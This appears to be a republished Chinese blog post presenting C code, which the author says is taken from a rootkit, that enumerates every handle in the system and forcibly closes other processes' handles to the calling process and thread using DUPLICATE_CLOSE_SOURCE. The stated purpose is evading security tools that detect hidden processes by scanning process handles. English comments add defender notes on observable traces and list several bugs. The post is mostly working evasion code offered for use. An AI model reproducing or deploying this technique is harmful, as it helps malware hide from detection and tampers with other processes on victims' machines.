抹掉所有進程中自己的句柄

之前聽過一個檢測進程的想法,就是暴力枚舉所有進程中的handle,查找其中類型為PROCESS的。
此法也被爐子牛用于他的LzOpenProcess().
下面我就寫了一段代碼來對抗這個方法,純屬小伎倆,牛牛們飄過~
嚴格說,此段代碼不算原創,是從某rootkit的bin中扒出來的,因此基本保留其原貌,經我修改測試,主要函數如下:
/*
 * CloseAllmyHandles
 *
 * Walks the system-wide handle table (ZwQuerySystemInformation /
 * SystemHandleInformation) and, for every handle in ANY process whose
 * kernel object address equals this process's own process object or its
 * current thread object, duplicates that handle with DUPLICATE_CLOSE_SOURCE
 * and then closes the duplicate. Net effect: the owner's handle to this
 * process/thread is gone, which defeats detectors that look for open
 * PROCESS handles (the technique the surrounding article describes).
 *
 * Defender notes (what this routine makes observable):
 *   - It opens its own process with PROCESS_ALL_ACCESS and then opens
 *     every matching owner process with PROCESS_DUP_HANDLE; such
 *     cross-process opens are exactly what process-access auditing
 *     (e.g. Sysmon ProcessAccess events, kernel object callbacks) records.
 *   - It issues a full SystemHandleInformation query, which is itself an
 *     uncommon call for ordinary application code.
 *
 * Assumptions / caveats visible in the code:
 *   - pHandleInfo is used but not declared in this function; presumably a
 *     file-scope variable in the original source (TODO confirm).
 *   - my_GetProcessId() / my_GetThreadId() are not defined in this listing.
 *   - The status of ZwOpenProcess/ZwOpenThread/ZwQuerySystemInformation is
 *     never checked; the handle count is read from the buffer regardless.
 *   - Casts to USHORT/DWORD assume 32-bit handle values and 32-bit object
 *     pointers (i.e. a 32-bit build); they truncate on 64-bit.
 *
 * No parameters, no return value; all work is via side effects on other
 * processes' handle tables and on stdout.
 */
void CloseAllmyHandles()
{
HANDLE hCurProcess,hSouceProcessHandle,hTargetHandle;
HANDLE hMyProcess=INVALID_HANDLE_VALUE,hMyThread=INVALID_HANDLE_VALUE;
// nBufferLen is a fixed 0x40000-byte (256 KiB) request; nRetnLen receives the
// size the query reports but is never consulted afterwards.
DWORD pid,nBufferLen=0x40000,nRetnLen=0;
DWORD HandleCnt,NumberOfHandles;
// Kernel object addresses of our own process / thread, captured as DWORD.
// They stay 0 if the first pass does not find them.
DWORD pMyProcessObject = 0,pMyThreadObject = 0,pObject;
CLIENT_ID myCid,tmpCid;
PVOID pBuffer = NULL;
NTSTATUS status;
OBJECT_ATTRIBUTES ObjectAttributes;
// Identify ourselves by (pid, tid) so we can open handles to our own objects.
myCid.UniqueProcess =(HANDLE)my_GetProcessId();
myCid.UniqueThread=(HANDLE)my_GetThreadId();
InitializeObjectAttributes( &ObjectAttributes, NULL, 0, NULL, NULL );
// Both opens are unchecked: on failure the handles stay INVALID_HANDLE_VALUE
// and are still used below. Note the thread open is given the *process*
// access mask (PROCESS_ALL_ACCESS rather than THREAD_ALL_ACCESS).
ZwOpenProcess(&hMyProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid);
ZwOpenThread(&hMyThread, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid);
// "%08x" with a HANDLE (pointer-sized) argument only lines up on 32-bit.
printf("hMyProcess:0x%08x\n",hMyProcess);
printf("hMyThread :0x%08x\n",hMyThread);
hCurProcess = GetCurrentProcess();
// Commit the query buffer in our own address space; nBufferLen is passed by
// pointer and may be rounded up by the allocator.
status=ZwAllocateVirtualMemory(hCurProcess, &pBuffer, 0, &nBufferLen, MEM_COMMIT,PAGE_READWRITE);
if (!NT_SUCCESS(status))
{
printf("Alloc Memory failed.\n");
return;
}
printf("Alloced Buffer:0x%08X\n",pBuffer);
// Return status is discarded: if the fixed buffer is too small the
// count read on the next lines comes from an unfilled buffer.
ZwQuerySystemInformation(SystemHandleInformation, pBuffer, nBufferLen, &nRetnLen);// 16=SystemHandleInformation
printf("Searching handles...\n");
// Buffer layout assumed here: a leading DWORD count followed by an array of
// SYSTEM_HANDLE_TABLE_ENTRY_INFO entries (see the sizeof(DWORD) offset below).
HandleCnt=*(DWORD *)pBuffer;
printf("Handle Count:%d\n",HandleCnt);
// Pass 1: locate the kernel object addresses behind our own two handles.
// Guarded with >1 here but >=1 in pass 2 - the two passes are inconsistent
// for a count of exactly 1.
if (HandleCnt>1)
{
NumberOfHandles=*(DWORD*)pBuffer;
pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD));
do
{
//printf("HandleValue:0x%08X\n",pHandleInfo->HandleValue);
// Match on the low 16 bits of the handle value and of our pid; the entry
// fields are USHORT, so wider values are silently truncated.
if ( pHandleInfo->HandleValue==(USHORT)hMyThread )
{
if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess )
{
// Reads the first 4 bytes of the Object field (assumed pointer-sized).
pMyThreadObject = *(DWORD*)&(pHandleInfo->Object);
printf("Thread finded\n");
}
}
if (pHandleInfo->HandleValue==(USHORT)hMyProcess )
{
if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess)
{
pMyProcessObject =*(DWORD*)&(pHandleInfo->Object);
printf("Process finded\n");
}
}
++pHandleInfo;
--NumberOfHandles;
}
while ( NumberOfHandles );
}
// Close our own two handles before the sweep: pass 2 does not filter by
// owner pid, so it would otherwise match (and close) them in this process too.
ZwClose(hMyThread);
ZwClose(hMyProcess);
// Printed unconditionally, even when pass 1 found nothing (objects still 0).
printf("Found my object ok.\nBegin Search and Close...\n");
NumberOfHandles=HandleCnt;
// Pass 2: every entry (any owner) whose object matches ours gets closed in
// its owner via duplicate-with-close-source.
if (HandleCnt>=1 )
{
pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD));
do
{
pObject = *(DWORD*)&(pHandleInfo->Object);
if ( pMyProcessObject == pObject || pMyThreadObject == pObject )
{
printf("Found Handle=0x%08X OwnerPID=%4d\n",pHandleInfo->HandleValue,pHandleInfo->UniqueProcessId);
// Open the owning process with just PROCESS_DUP_HANDLE. Owners we lack
// rights for fail here and are skipped silently (status != 0 path).
tmpCid.UniqueProcess= (HANDLE)pHandleInfo->UniqueProcessId;
tmpCid.UniqueThread=0;
InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL );
status=ZwOpenProcess(&hSouceProcessHandle, PROCESS_DUP_HANDLE, &ObjectAttributes, &tmpCid);
//PrintZwError("ZwOpenProcess",status);
// `!status` accepts only STATUS_SUCCESS (0), not the broader NT_SUCCESS range.
if (!status)
{
// DUPLICATE_CLOSE_SOURCE removes the handle from the owner's table as
// part of the duplication; the copy we receive is closed right after.
status=ZwDuplicateObject(
hSouceProcessHandle,
(void*)pHandleInfo->HandleValue,
hCurProcess,
&hTargetHandle,
0,
0,
DUPLICATE_CLOSE_SOURCE);
if ( !status)
{
ZwClose(hTargetHandle);
printf("Handle closed!\n");
}
//PrintZwError("ZwDuplicateObject",status);
ZwClose(hSouceProcessHandle);
}
}
++pHandleInfo;
--NumberOfHandles;
}
while ( NumberOfHandles );
}
// Release the query buffer; nBufferLen is whatever the allocation call left in it.
ZwFreeVirtualMemory(hCurProcess, &pBuffer, &nBufferLen, MEM_RELEASE);
}
新聞名稱:抹掉所有進程中自己的句柄
文章起源:http://fisionsoft.com.cn/article/dhpgdhi.html


